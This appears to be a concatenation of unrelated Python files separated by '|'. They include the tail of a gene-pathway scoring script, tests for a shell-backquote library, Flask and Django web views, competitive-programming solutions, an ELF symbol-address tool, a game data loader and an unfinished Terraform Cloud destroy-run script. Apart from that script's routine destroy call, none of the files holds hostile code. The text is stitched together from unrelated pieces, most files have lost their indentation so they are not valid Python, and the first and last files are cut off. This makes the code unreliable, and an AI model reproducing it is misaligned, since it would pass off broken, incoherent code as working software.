print pwpvData[keyList[0]]
## ------------------------------------------------------------------------
## so what *are* the top 20 genes and what is the maximum s20 score ???
## NOTE that by this point we have filtered OUT any genes that are not in the pwGeneList !!!
topGenes = findTopGenes ( pwpvData, 20 )
## print " HERE (a) "
## report on pathway membership of the top 20 genes ...
pwMembership ( pwDict, topGenes )
## print " HERE (b) "
## 15may13 ... or look at pathway membership of all associated genes ???
pwMembership2 ( pwDict, pwpvData )
## print " HERE (c) "
## ------------------------------------------------------------------------
## finally we need to generate the "random" pathways ...
( pwDict, minLen, maxLen ) = addRandomPathways ( pwDict, numRandFactor )
print "## range of pathway lengths : ", minLen, maxLen
print "## (e) TIME ", time.asctime(time.localtime(time.time()))
## print " HERE (d) "
## ------------------------------------------------------------------------
## and now we can finally compute the scores for all of the pathways
## on the cluster ...
pwScores = goScorePathways ( pwDict, pwpvData )
    if ( debugFlag ): print len(pwScores)
## next parse the output ...
( outLines, iMaxScore, iMinScore ) = parseOutput ( pwScores, pwDict )
## outLines is a list, and one entry looks like this:
## [493.7, [' 493.7', 'RANDOM_PATHWAY_33329__72', '\n']]
## and now use the 'real' and 'random' pathway scores to build
## a hi/lo counts matrix and estimate significance ...
( countsHiLo, estLogP ) = scoreOutput ( outLines, iMaxScore, iMinScore, pwDict )
## and finally pretty-print the output ...
prettyPrintScores ( outLines, estLogP )
print "## "
print "## (m) TIME (DONE) ", time.asctime(time.localtime(time.time()))
print "## "
#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
|
# -*- coding:utf-8 -*-
import distutils.version
import os
import subprocess
import sys
import tempfile
import textwrap
import unittest
try:
from test.test_support import EnvironmentVarGuard, captured_stdout
except ImportError:
from test.support import EnvironmentVarGuard, captured_stdout
try:
from unittest.mock import MagicMock, patch
except ImportError:
from mock import MagicMock, patch
import backquotes
class TestBackquotes(unittest.TestCase):
def test___all__(self):
self.assertEqual(backquotes.__all__, ['shell', 'preprocess'])
def test___version__(self):
version = distutils.version.StrictVersion(backquotes.__version__)
self.assertTrue(version)
def test_shell(self):
spam = 'spam' # noqa
result = backquotes.shell('printf $spam | tr [a-z] [A-Z]')
self.assertEqual(result, 'SPAM')
def test_preprocess(self):
source = textwrap.dedent('''
spam = 'spam'
print(`printf $spam | tr [a-z] [A-Z]`)
''')
expected = textwrap.dedent("""
spam ='spam'
print (backquotes .shell (r'''printf $spam | tr [a-z] [A-Z]'''))
""")
with tempfile.NamedTemporaryFile('w+') as f:
f.write(source)
f.seek(0)
result = backquotes.preprocess(f.name, f.readline)
self.assertEqual(result, expected)
def test__append_to_python_path_when_python_path_is_not_set(self):
with EnvironmentVarGuard() as env:
del env['PYTHONPATH']
with backquotes._append_to_python_path('spam'):
self.assertEqual(env['PYTHONPATH'], 'spam')
def test__append_to_python_path_when_python_path_is_set(self):
with EnvironmentVarGuard() as env:
env['PYTHONPATH'] = 'spam'
with backquotes._append_to_python_path('ham'):
self.assertEqual(env['PYTHONPATH'], 'spam:ham')
def test__detect_environment_when_filename_is_stdin_and_file_does_not_exist(self):
frame = MagicMock()
frame.f_code.co_filename = '<stdin>'
frame.f_locals.get.return_value = None
self.assertEqual(backquotes._detect_environment(frame), 'repl')
def test__detect_environment_with_filename_is_stdin_and_file_exists(self):
frame = MagicMock()
frame.f_code.co_filename = '<stdin>'
frame.f_locals = {'__file__': 'spam'}
self.assertEqual(backquotes._detect_environment(frame), 'redirect')
def test__detect_environment_with_filename_is_not_stdin_and_name_is_not_main(self):
frame = MagicMock()
frame.f_code.co_filename = 'spam'
frame.f_back.f_locals = {'__name__': 'ham'}
self.assertEqual(backquotes._detect_environment(frame), 'module')
def test__detect_environment_with_filename_is_not_stdin_and_name_is_main(self):
frame = MagicMock()
frame.f_code.co_filename = 'spam'
frame.f_back.f_locals = {'__name__': '__main__'}
self.assertEqual(backquotes._detect_environment(frame), 'script')
def test__exec(self):
backquotes._exec('self.test__exec_result = True', globals(), locals())
self.assertTrue(self.test__exec_result)
del self.test__exec_result
def test__is_quoted(self):
self.assertTrue(backquotes._is_quoted('"spam"'))
self.assertFalse(backquotes._is_quoted('spam'))
self.assertFalse(backquotes._is_quoted('"spam\''))
def test__triple_quote(self):
result = backquotes._triple_quote('spam')
expected = "r'''spam'''"
self.assertEqual(result, expected)
def test__main_help(self):
with captured_stdout() as s:
self.assertRaises(SystemExit, backquotes._main, ['-h'])
self.assertIn('Usage:', s.getvalue())
self.assertRaises(SystemExit, backquotes._main, ['--help'])
self.assertIn('Usage:', s.getvalue())
def test__main_version(self):
with captured_stdout() as s:
self.assertRaises(SystemExit, backquotes._main, ['--version'])
self.assertEqual(backquotes.__version__ + '\n', s.getvalue())
def test__main_with_stdin(self):
with tempfile.NamedTemporaryFile('w+') as f:
f.write('import backquotes\n`echo spam`')
f.seek(0)
with patch('sys.stdin', new=f):
self.assertEqual(backquotes._main([]), 0)
def test_import_in_repl(self):
with tempfile.TemporaryFile('w+') as f:
f.write('import backquotes\n')
f.seek(0)
process = subprocess.Popen([sys.executable],
stdin=f,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = process.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UserWarning:', err)
def assertIn(self, member, container, msg=None):
try:
super(TestBackquotes, self).assertIn(member, container, msg)
except AttributeError:
self.assertTrue(member in container, msg)
|
# -*- coding: utf-8 -*-
import sys
import time
import logging
import os
from socketIO_client import SocketIO, BaseNamespace
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from websk.conf import SOCKET_HOST, SOCKET_PORT
logging.getLogger('socketIO-client').setLevel(logging.DEBUG)
logging.basicConfig()
class BaseSendMsgSocket(object):
"""这是短连接的websocket发送消息的类""" # TODO 可以继续完善出 长连接的类
def __init__(self, socket_host="127.0.0.1", socket_port=3000):
self.instance_socket = SocketIO(socket_host, socket_port)
def send_msg(self, namespace, topic, data):
class ChatNamespace(BaseNamespace):
def on_aaa_response(self, *args):
print('on_aaa_response', args)
chatNamespace = self.instance_socket.define(ChatNamespace, namespace)
chatNamespace.emit(topic, data)
        self.instance_socket.wait(seconds=1)  # TODO: the wait time (seconds) could be tuned
class BaseRecvMsgSocket(object):
_msg_dict = None
def __init__(self, socket_host="127.0.0.1", socket_port=3000):
self.instance_socket = SocketIO(socket_host, socket_port)
def listen(self, namespace, topic):
class ChatNamespace(BaseNamespace):
def on_aaa_response(self, *args):
print('on_aaa_response', args)
chatnamespace = self.instance_socket.define(ChatNamespace, namespace)
def on_update_process(*args):
            # store the received payload on the class so recv_msg() can see it
            BaseRecvMsgSocket._msg_dict = args[0]
chatnamespace.on(topic, on_update_process)
self.instance_socket.wait()
@classmethod
def recv_msg(cls):
while True:
if cls._msg_dict is not None:
return BaseRecvMsgSocket._msg_dict
else:
time.sleep(0.1)
continue
if __name__ == '__main__':
namespace = '/test'
# namespace = ''
topic = 'heart ping'
# topic = ''
data = {"heart": 'ping'}
sk = BaseSendMsgSocket(socket_host=SOCKET_HOST, socket_port=SOCKET_PORT)
sk.send_msg(namespace, topic, data) |
from flask import Flask, render_template, request, redirect, url_for, flash
from sqlalchemy import create_engine, asc
from sqlalchemy.orm import sessionmaker
from flask import session as login_session
import random
import string
from models.base import Base
from models.user import User
from models.store import Store
from models.product import Product
app = Flask(__name__)
engine = create_engine('postgresql://catalog:catalog@localhost:5432/catalog')
Base.metadata.bind = engine
DBSession = sessionmaker(bind=engine)
session = DBSession()
# DB query helper functions
def checkStore(store_id):
result = session.query(Store).filter_by(id=store_id).first()
if not result:
flash("Store ID doesn't exist!")
return result
def checkProduct(product_id):
result = session.query(Product).filter_by(id=product_id).first()
if not result:
flash("Product ID doesn't exist!")
return result
def checkUser(user_id):
result = session.query(User).filter_by(id=user_id).first()
if not result:
flash("User ID doesn't exist!")
return result
# Permissions helper functions
def checkLogin():
if 'user_id' not in login_session:
flash("Please log in with your Google+ account to make changes.")
return None
return True
def checkOwner(store_id):
store = checkStore(store_id)
owner = checkUser(store.user_id)
if owner.id != login_session['user_id']:
flash("You don't have permission to edit that store or its products.")
return None
return True
# User helper functions
def createUser(login_session):
newUser = User(name=login_session['username'], email=login_session['email'])
session.add(newUser)
session.commit()
user = session.query(User).filter_by(email=login_session['email']).first()
return user.id
def getUserID(email):
user = session.query(User).filter_by(email=email).first()
if not user:
return None
return user.id
# Create anti-forgery state token
def makeState():
state = ''.join(random.choice(string.ascii_uppercase + string.digits)
for x in xrange(32))
login_session['state'] = state
return state
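# A hypothetical login route showing how makeState() is intended to be used
# (the route, template name, and OAuth flow are assumptions, not part of this
# module, so the sketch is left commented out):
# @app.route('/login')
# def showLogin():
#     state = makeState()
#     return render_template('login.html', STATE=state)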
|
import re
def minion_game(string):
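    # There are (len(string) - i) substrings starting at index i, and each one
    # scores a point for its owner: vowel starts count for Kevin (p_v),
    # consonant starts for Stuart (p_c).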
vowels = re.compile('^[AEIOU]')
p_v = 0
p_c = 0
for x_i in range(len(string)):
if vowels.match(string[x_i]):
p_v += (len(string)-x_i)
else:
p_c += (len(string)-x_i)
if p_c > p_v:
print(f'Stuart {p_c}')
elif p_c < p_v:
print(f'Kevin {p_v}')
else:
print('Draw')
if __name__ == '__main__':
s = input()
minion_game(s)
|
import os
import subprocess
import string
builddir = "_build/"
toolchain = "arm-none-eabi-"
def get_data_addrs():
head, tail = os.path.split(os.getcwd())
disasm = builddir + tail + ".asm"
data_addr = []
# minAddr = -1
with open(disasm, "rb") as f:
for line in f:
item_list = line.split("\t")
if len(item_list) >= 4:
# if minAddr == -1:
# minAddr = int(item_list[0].split(":")[0], 16)
if (item_list[2] == ".word"):
data_addr.append(int(item_list[0].split(":")[0], 16)-65536)
data_addr = list(set(data_addr))
data_addr.sort()
# for i in range(len(data_addr)):
# print data_addr[i]
return data_addr
def is_hex(s):
try:
int(s, 16)
return True
except ValueError:
return False
def get_min_addr():
head, tail = os.path.split(os.getcwd())
elf_name = builddir + tail + ".elf"
command = toolchain + "nm " + elf_name + " | grep -i \" t \""
output = subprocess.check_output(command, shell=True)
names = output.split()
func_addr = []
first_func_name = ''
minAddr = int(names[0], 16)
for i in range(len(names)/3):
addr = int(names[3*i], 16)
if addr <= minAddr:
first_func_name = names[3*i+2]
minAddr = addr
return minAddr
def get_symb_addrs():
head, tail = os.path.split(os.getcwd())
elf_name = builddir + tail + ".elf"
command = toolchain + "nm " + elf_name + " | grep -i \" t \""
output = subprocess.check_output(command, shell=True)
names = output.split()
func_addr = []
first_func_name = ''
minAddr = int(names[0], 16)
for i in range(len(names)/3):
addr = int(names[3*i], 16)
if addr <= minAddr:
first_func_name = names[3*i+2]
minAddr = addr
# if minAddr >= 8 :
# minAddr -= 4
for i in range(len(names)/3):
# addr = int(names[3*i], 16) - minAddr
addr = int(names[3*i], 16) - 65536
func_addr.append(addr)
if names[3*i+2] == "main":
ent_addr = addr
func_addr = list(set(func_addr))
func_addr.sort()
func_addr.insert(0, ent_addr)
# for i in range(len(func_addr)):
# print func_addr[i]
elf_name = builddir + tail + ".4gem5"
command = toolchain + "nm " + elf_name + " | grep -i \" t \""
output = subprocess.check_output(command, shell=True)
names = output.split()
nNoName = 0
i = 0
while True:
if (3*i >= (len(names) + nNoName)):
break
if (is_hex(names[3*i+2-nNoName])):
nNoName += 1
if names[3*i+2-nNoName] == first_func_name:
func_addr.insert(0, int(names[3*i-nNoName], 16))
i += 1
return func_addr
#if __name__ == "__main__":
# get_ent_addr()
# get_data_addr()
# get_func_addr()
|
from __future__ import annotations
from typing import Generator
class StdReader:
def __init__(
self,
    ) -> None:
import sys
self.buf = sys.stdin.buffer
self.lines = (
self.async_readlines()
)
self.chunks: Generator
def async_readlines(
self,
) -> Generator:
while True:
gen = self.line_chunks()
yield gen
def line_chunks(
self,
) -> Generator:
ln = self.buf.readline()
for chunk in ln.split():
yield chunk
def __call__(
self,
) -> bytes:
try:
chunk = next(self.chunks)
        except (AttributeError, StopIteration):
            # either no chunk generator exists yet, or the current line is
            # exhausted; advance to the next line and retry
self.chunks = next(
self.lines,
)
chunk = self()
return chunk
def str(
self,
) -> str:
b = self()
return b.decode()
def int(
self,
) -> int:
return int(self.str())
from abc import ABC, abstractmethod
class Solver(ABC):
def __init__(self):
self.reader = StdReader()
def __call__(
self,
):
self.prepare()
self.solve()
@abstractmethod
def prepare(self):
...
@abstractmethod
def solve(self):
...
import numpy as np
class NumpyModular:
mod: int = None
def __init__(
self,
mod: int,
):
self.mod = mod
def mat_pow(
self,
a: np.ndarray,
n: int,
) -> np.ndarray:
if n == 0:
e = np.identity(
a.shape[0],
dtype=np.int64,
)
return e
x = self.mat_pow(a, n >> 1)
x = self.mat_dot(x, x)
if n & 1:
x = self.mat_dot(x, a)
return x
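    # mat_dot avoids int64 overflow in np.dot by splitting each matrix into
    # 15-bit low/high halves, taking three modular dot products, and
    # recombining them (a Karatsuba-style trick for modular matrix products).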
def mat_dot(
self,
a: np.ndarray,
b: np.ndarray,
):
mod = self.mod
N = 15
MASK = (1 << N) - 1
a0, a1 = a & MASK, a >> N
b0, b1 = b & MASK, b >> N
c0 = np.dot(a0, b0) % mod
c2 = np.dot(a1, b1) % mod
c1 = np.dot(
a0 + a1,
b0 + b1,
) - c0 - c2
c1 %= mod
c = c2 << N * 2
c += c1 << N
c += c0
c %= mod
return c
def inv(self, n: int):
p = self.mod
n = int(n)
return pow(n, p - 2, p)
def cumprod(self, a):
l = len(a)
n = int(np.sqrt(l) + 1)
a = np.resize(a, (n, n))
for i in range(n-1):
a[:, i + 1] *= a[:, i]
a[:, i + 1] %= self.mod
for i in range(n-1):
a[i + 1] *= a[i, -1]
a[i + 1] %= self.mod
return np.ravel(a)[:l]
def factorial(self, n: int):
fact = np.arange(n)
fact[0] = 1
return self.cumprod(fact)
def inv_factorial(
self,
n: int,
):
fact = self.factorial(n)
ifact = np.arange(1, n + 1)
ifact[-1] = self.inv(
fact[-1],
)
return self.cumprod(
ifact[::-1],
)[n::-1]
mod = 10 ** 9 + 7
class Problem(
Solver,
):
def prepare(self):
reader = self.reader
n = reader.int()
m = reader.int()
k = reader.int()
a = [
reader.int()
for _ in range(n)
]
a = np.array(a)
xy = [
reader.int()
for _ in range(2 * m)
]
xy = np.array(
xy,
).reshape(m, 2) - 1
self.n = n
self.m = m
self.k = k
self.a = a
self.xy = xy
def solve(self):
self.make_graph()
np_mod = NumpyModular(mod)
g = self.g
k = self.k
g = np_mod.mat_pow(g, k)
a = self.a
a = np_mod.mat_dot(g, a)
a = a.ravel()
print(*a, sep='\n')
def make_graph(self):
n = self.n
g = np.identity(
n,
dtype=np.int64,
)
m = self.m
g *= m * 2
xy = self.xy
x, y = xy.T
np.add.at(g, (x, x), -1)
np.add.at(g, (y, y), -1)
np.add.at(g, (x, y), 1)
np.add.at(g, (y, x), 1)
b = pow(
2 * m,
mod - 2,
mod,
)
g *= b
g %= mod
self.g = g
def main():
t = 1
# t = StdReader().int()
for _ in range(t):
Problem()()
if __name__ == '__main__':
main()
|
list1=[12, -7, 5, 64, -14]
for i in list1:
if i < 0 :
continue
print(i)
list2=[12, 14, -95, 3]
for i in list2:
if i < 0:
continue
print(i)
|
import os
import json
from app.data import constants, stats, equations, tags, weapons, factions, terrain, mcost, \
minimap, items, klass, units, parties, ai, difficulty_modes, translations, skills, levels, \
lore, supports, overworld, overworld_node
from app.events import event_prefab
import logging
class Database(object):
save_data_types = ("constants", "stats", "equations", "mcost", "terrain", "weapon_ranks",
"weapons", "factions", "items", "skills", "tags", "classes",
"support_constants", "support_ranks", "affinities", "units", "support_pairs",
"ai", "parties", "difficulty_modes",
"translations", "lore", "levels", "events", "overworlds")
def __init__(self):
self.constants = constants.constants
        self.teams = ["player", "enemy", "enemy2", "other"]  # Order determines phase order
self.stats = stats.StatCatalog()
self.equations = equations.EquationCatalog()
self.mcost = mcost.McostGrid()
self.terrain = terrain.TerrainCatalog()
self.minimap = minimap.MinimapCatalog()
self.weapon_ranks = weapons.RankCatalog()
self.weapons = weapons.WeaponCatalog()
self.factions = factions.FactionCatalog()
self.items = items.ItemCatalog()
self.skills = skills.SkillCatalog()
self.tags = tags.TagCatalog(['Lord', 'Boss', 'Armor', 'Horse', 'Mounted', 'Dragon', 'ZeroMove', 'AutoPromote', 'NoAutoPromote'])
self.classes = klass.ClassCatalog()
self.support_constants = supports.constants
self.support_ranks = supports.SupportRankCatalog(['C', 'B', 'A'])
self.affinities = supports.AffinityCatalog()
self.units = units.UnitCatalog()
self.support_pairs = supports.SupportPairCatalog()
self.parties = parties.PartyCatalog()
self.ai = ai.AICatalog()
self.difficulty_modes = difficulty_modes.DifficultyModeCatalog()
self.overworlds = overworld.OverworldCatalog()
self.levels = levels.LevelCatalog()
self.events = event_prefab.EventCatalog()
self.translations = translations.TranslationCatalog()
self.lore = lore.LoreCatalog()
# === Saving and loading important data functions ===
def restore(self, save_obj):
for data_type in self.save_data_types:
logging.info("Database: Restoring %s..." % data_type)
getattr(self, data_type).restore(save_obj[data_type])
def save(self):
# import time
to_save = {}
for data_type in self.save_data_types:
# logging.info("Saving %s..." % data_type)
# time1 = time.time_ns()/1e6
to_save[data_type] = getattr(self, data_type).save()
# time2 = time.time_ns()/1e6 - time1
# logging.info("Time taken: %s ms" % time2)
return to_save
def serialize(self, proj_dir):
data_dir = os.path.join(proj_dir, 'game_data')
if not os.path.exists(data_dir):
os.mkdir(data_dir)
logging.info("Serializing data in %s..." % data_dir)
import time
start = time.time_ns()/1e6
to_save = self.save()
# This section is what takes so long!
for key, value in to_save.items():
temp_save_loc = os.path.join(data_dir, key + '_temp.json')
save_loc = os.path.join(data_dir, key + '.json')
logging.info("Serializing %s to %s" % (key, save_loc))
with open(temp_save_loc, 'w') as serialize_file:
json.dump(value, serialize_file, indent=4)
os.replace(temp_save_loc, save_loc)
end = time.time_ns()/1e6
logging.info("Total Time Taken for Database: %s ms" % (end - start))
logging.info("Done serializing!")
def load(self, proj_dir):
data_dir = os.path.join(proj_dir, 'game_data')
logging.info("Deserializing data from %s..." % data_dir)
save_obj = {}
for key in self.save_data_types:
save_loc = os.path.join(data_dir, key + '.json')
if os.path.exists(save_loc):
logging.info("Deserializing %s from %s" % (key, save_loc))
with open(save_loc) as load_file:
save_obj[key] = json.load(load_file)
else:
logging.warning("%s does not exist!" % save_loc)
save_obj[key] = []
self.restore(save_obj)
logging.info("Done deserializing!")
DB = Database()
# Testing
# Run "python -m app.data.database" from main directory
|
from __future__ import annotations
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from .Graph import Graph
import glm
class PointLight:
def __init__(self, graph: Graph, pos: glm.vec3,
ambient: glm.vec3, diffuse: glm.vec3, specular: glm.vec3,
k: glm.vec3):
self.graph = graph
self.graph.addLights(self)
self.position = pos
self.ambient = ambient
self.diffuse = diffuse
self.specular = specular
self.k = k
|
"""
Main function for running transBG jobs.
Examples:
--------
* If you define an "input.json" with desired job parameters in job_dir/:
(transBG) ~/transBG$ python main.py --job_dir path/to/job_dir/
* If you instead want to run your job using the submission scripts:
(transBG) ~/transBG$ python submit-fine-tuning.py
This script is adapted from https://github.com/MolecularAI/GraphINVENT/blob/bdd69ffd11816f8781be9fc8f807750375f61809/graphinvent/main.py
"""
# load general packages and functions
import datetime
import json
import torch
# load transBG-specific functions
from utils.load_parameters import load_parameters
from utils.command_line_args import args
from transBG import TransBG
def main():
"""
Defines the type of job (preprocessing, training, generation, testing, or
fine-tuning), writes the job parameters (for future reference), and runs
the job.
"""
_ = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") # fix date/time
with open(args.job_dir+"input.json") as json_file:
params_dict = json.load(json_file)
class Struct:
def __init__(self, **entries):
self.__dict__.update(entries)
params = Struct(**params_dict)
# create an instance of a transBG object
conformer_gen = TransBG(params)
conformer_gen.build_model()
job_type = params.job_type
print(f"* Run mode: '{job_type}'", flush=True)
if job_type == "likelihood":
# train model with only likelihood-based learning using all the molecules in the dataset
conformer_gen.train_likelihood()
elif job_type == "energy":
# fine-tune the model with energy based learning using a smaller set of molecules (energy_train_indices)
conformer_gen.model.load_state_dict(torch.load(params.pre_trained_model))
if params.finetune_l:
conformer_gen.finetune_likelihood()
conformer_gen.train_energy()
else:
raise NotImplementedError("Not a valid `job_type`.")
if __name__ == "__main__":
main()
|
import json, requests, datetime, ast
from .profiler_test import profile
from administer import context_processors,helper
from django.contrib import messages
from django.db import IntegrityError
from django.shortcuts import render
from administer.models import Services, Nodes,Service_cluster_reference
from administer.helper import helper
from .models import User_preferred_configuration, Backup_configuration, Restart_after_configuration, sync_configuration,Default_configuration
from django.http import JsonResponse
# Create your views here.
def index_add(request):
context = context_processors.base_variables_all(request)
context["action"]="add"
return render(request, 'configuraion/configuration.html', context)
def index_edit(request):
context = context_processors.base_variables_all(request)
context["action"] = "edit"
return render(request, 'configuraion/configuration.html',context)
def index_show(request):
context = context_processors.base_variables_all(request)
node = Nodes.objects.all()
context["node"] = node
context["action"] = "show"
return render(request, 'configuraion/configuration_copy.html', context)
def index_show_backup(request, id):
context = context_processors.base_variables_all(request)
node = Nodes.objects.all()
context["node"] = node
context["action"] = "backup"
return render(request, 'configuraion/configuration.html', context)
def add_configure_service(request, service):
service_object = Services.objects.get(name=service)
key_configurations_users = User_preferred_configuration.objects.filter(service_id=service_object.id)
key_configurations = Default_configuration.objects.exclude(name__in=[x.key_name for x in key_configurations_users]).filter(service_id=service_object.id)
nodes_configuration = helper(request).get_all_nodes()
context = context_processors.base_variables_all(request)
context["key_configurations"] = key_configurations
context["id"] = service_object.id
context["service_name"] = service
context["nodes_configuration"] = nodes_configuration
return render(request, 'configuraion/configure_service.html', context)
def add_configure_service_ajax(request):
    if request.is_ajax() and request.method == "POST":
key_name = request.POST['key_name']
key_value = request.POST['key_value']
key_type = request.POST['key_type']
nodes_submit = request.POST.getlist('nodes')
service_id = request.POST['service_id']
nodes_submit = ast.literal_eval(nodes_submit[0])
        if nodes_submit == []:
            delete_user_preferred = User_preferred_configuration.objects.filter(key_name=key_name)
            delete_user_preferred.delete()
data = {'success': True}
return JsonResponse(data)
else:
configure_row_user = User_preferred_configuration.objects.filter(key_name=key_name,
service_id=service_id,
key_type=key_type).exists()
if configure_row_user:
row_user1 = User_preferred_configuration.objects.filter(key_name=key_name, service_id=service_id,
key_type=key_type)
value_dict = {}
for node in nodes_submit:
value_dict[str(node)] = key_value
row_user1.update(value=value_dict)
data = {'success': True}
return JsonResponse(data)
else:
value_dict = {}
for node in nodes_submit:
value_dict[str(node)] = key_value
create_conf_user = User_preferred_configuration(service_id=service_id, key_name=key_name,
value=value_dict, key_type=key_type)
create_conf_user.save()
data = {'success': True}
return JsonResponse(data)
def edit_configure_submit_ajax(request):
    if request.is_ajax() and request.method == "POST":
key_name = request.POST['key_name']
key_value = request.POST['key_value']
key_type = request.POST['key_type']
service_id = request.POST['service_id']
configure_row_user = User_preferred_configuration.objects.filter(key_name=key_name,
service_id=service_id,
key_type=key_type).exists()
if configure_row_user:
row_user1 = User_preferred_configuration.objects.filter(key_name=key_name, service_id=service_id,
key_type=key_type)
row_user1.update(value=key_value)
data = {'success': True}
return JsonResponse(data)
else:
create_conf_user = User_preferred_configuration(service_id=service_id, key_name=key_name,
value=key_value, key_type=key_type)
create_conf_user.save()
data = {'success': True}
return JsonResponse(data)
def add_configure_nodes_save(request):
nodes = helper(request).get_all_nodes()
service_id = request.POST['service_id']
for node in nodes:
configuration = {}
row_user_types = User_preferred_configuration.objects.order_by().values('key_type').distinct() \
.filter(value__contains=node, service_id=service_id)
for row_user_type in row_user_types:
configuration_inside = {}
row_users = User_preferred_configuration.objects.filter(key_type=row_user_type['key_type'], value__contains=node)
for row_user in row_users:
value = ast.literal_eval(row_user.value)
configuration_inside[row_user.key_name] = value[str(node)]
configuration[row_user_type['key_type']] = configuration_inside
url = "http://%s:11605/config/" % node
response = requests.post(url, data=json.dumps(configuration), headers={"API-KEY": helper.get_api_key()})
response_dict = json.loads(response.content.decode())
if response_dict["success"] == 0:
data = {
'success': False
}
return JsonResponse(data)
data = {
'success': True
}
restart_service_check = Restart_after_configuration.objects.filter(service_id=service_id).exists()
if restart_service_check:
restart_service = Restart_after_configuration.objects.get(service_id=service_id)
restart_service.status = 1
restart_service.save()
else:
restart_service = Restart_after_configuration(service_id=service_id, status=1)
restart_service.save()
return JsonResponse(data)
def edit_configure_service(request, service):
context = context_processors.base_variables_all(request)
service_object = Services.objects.get(name=service)
nodes_configuration = helper(request).get_all_nodes()
key_configurations = User_preferred_configuration.objects.filter(service_id=service_object.id)
context["key_configurations"]=key_configurations
context["id"]=service_object.id
context["service_name"]=service
context["nodes_configuration"]=nodes_configuration
return render(request, 'configuraion/edit_configuration.html', context)
def show_configure_service(request):
context = context_processors.base_variables_all(request)
node = request.GET["node"]
service = request.GET["service_id"]
key_configurations = User_preferred_configuration.objects.filter(service_id=service, value__contains=node)
if key_configurations:
key_configuration_list = []
for key_configuration in key_configurations:
key_configuration_dict = {}
key_configuration_dict["key"] = key_configuration.key_name
key_configuration_dict["type"] = key_configuration.key_type
value = ast.literal_eval(key_configuration.value)
key_configuration_dict["value"] = value[str(node)]
key_configuration_list.append(key_configuration_dict)
context["key_configurations"] = key_configuration_list
backup_key_configurations = Backup_configuration.objects.filter(service_id=service, value__contains=node)
if backup_key_configurations:
backup_key_configurations_list = []
for key_configuration in backup_key_configurations:
backup_key_configurations_dict = {}
backup_key_configurations_dict["key"] = key_configuration.key_name
backup_key_configurations_dict["type"] = key_configuration.key_type
value = ast.literal_eval(key_configuration.value)
backup_key_configurations_dict["value"] = value[str(node)]
backup_key_configurations_list.append(backup_key_configurations_dict)
context["backup_key_configurations"] = backup_key_configurations_list
context["node_ip"] = node
context["service_name"] = service
return render(request, 'configuraion/show_configuration.html', context)
def sync_configurations(request):
try:
data = ""
user_configurations = User_preferred_configuration.objects.all()
backup_configurations = Backup_configuration.objects.all()
if backup_configurations:
backup_configurations.delete()
if user_configurations:
try:
for user_configuration in user_configurations:
user_configuration_dict = user_configuration.__dict__
user_configuration_dict.pop('id')
user_configuration_dict.pop('_state')
Backup_configuration.objects.create(**user_configuration_dict)
user_name_sync = request.user.username
last_sync = datetime.datetime.now()
sync_configuration.objects.create(sync_by=user_name_sync, last_sync=last_sync)
data = {
'success': True
}
except Exception as e:
data = {
'success': False,
'msg': '%s' % e
}
return JsonResponse(data)
else:
data = {
'success': False,
'msg': 'user configuration table is empty'
}
except Exception as e:
data = {
'success': False,
'msg': '%s' % e
}
return JsonResponse(data)
def revert_configuration(request):
try:
user_configurations = User_preferred_configuration.objects.all()
backup_configurations = Backup_configuration.objects.all()
if user_configurations:
user_configurations.delete()
if backup_configurations:
for backup_configuration in backup_configurations:
backup_configuration_dict = backup_configuration.__dict__
backup_configuration_dict.pop('id')
backup_configuration_dict.pop('_state')
User_preferred_configuration.objects.create(**backup_configuration_dict)
data = {
'success': True
}
else:
data = {
'success': False,
'msg': "backup table is empty...revert aborted"
}
except Exception as e:
data = {
'success': False,
'msg': '%s' % e
}
return JsonResponse(data)
def add_configure_service_other_ajax(request):
other_configurations = request.POST['other_configurations']
service_id = request.POST['service_id']
other_configurations = json.loads(other_configurations)
list_data = []
for other_configuration in other_configurations:
try:
for other_configuration_type in other_configuration['type']:
value_dict = {}
for node in other_configuration['node']:
value_dict[str(node)] = other_configuration['value']
User_preferred_configuration.objects.create(service_id=service_id, key_name=other_configuration['key'],
value=value_dict, key_type=other_configuration_type)
data = {
'success': True,
}
list_data.append(data)
except IntegrityError as e:
data = {
'success': False,
'msg': 'key_name duplicate *%s' % other_configuration['key'],
}
list_data.append(data)
list_data1 = {'list_data': list_data}
return JsonResponse(list_data1)
def settings(request):
return render(request, 'settings/setting.html')
def show_backup_configurations(request):
key_configurations = Backup_configuration.objects.all()
return render(request, 'configuraion/backup_configuration.html', {"key_configurations": key_configurations})
def show_backup_configure_service(request, node, service):
context = context_processors.base_variables_all(request)
service_id = Services.objects.get(name=service).id
node_ip = Nodes.objects.get(id=node).ip
key_configurations = Backup_configuration.objects.filter(service_id=service_id, value__contains=node_ip)
context["key_configurations"] = key_configurations
context["node_ip"] = node_ip
context["service_name"] = service
return render(request, 'configuraion/backup_configuration.html', context)
|
from .post_translation import PostTranslationService
from .interface import (
PostTranslationConfig,
PostTranslationRequest,
PostTranslationResponse,
)
|
# Generated by Django 3.2.8 on 2022-01-05 20:22
import cloudinary.models
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('thehood', '0005_auto_20220105_1750'),
]
operations = [
migrations.CreateModel(
name='NeighbourHood',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=50)),
('location', models.CharField(max_length=60)),
('photo', cloudinary.models.CloudinaryField(max_length=255, verbose_name='image')),
('description', models.TextField()),
('occupants_count', models.IntegerField(blank=True, default=0)),
('health_toll', models.IntegerField(blank=True, null=True)),
('police_toll', models.IntegerField(blank=True, null=True)),
('admin', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='hood', to='thehood.profile')),
],
),
]
|
from . import BlobDetector
|
import os
import sys
from terrasnek.api import TFC
def queue_destroy_run(api, workspace_name):
workspace = api.workspaces.show(workspace_name)
    if workspace is None:
print('Error: unable to find a workspace named ' + workspace_name)
exit(1)
workspace_id = workspace["data"]["id"]
payload = {
"data": {
"attributes": {
"is-destroy": True
},
"relationships": {
"workspace": {
"data": {
"id": workspace_id
}
}
}
}
}
run = api.runs.create(payload)
    if run is None:
print('Error: Unable to queue destroy plan. The provided token probably does not have "apply" permission.')
exit(1)
run_id = run["data"]["id"]
return run_id
if __name__ == "__main__":
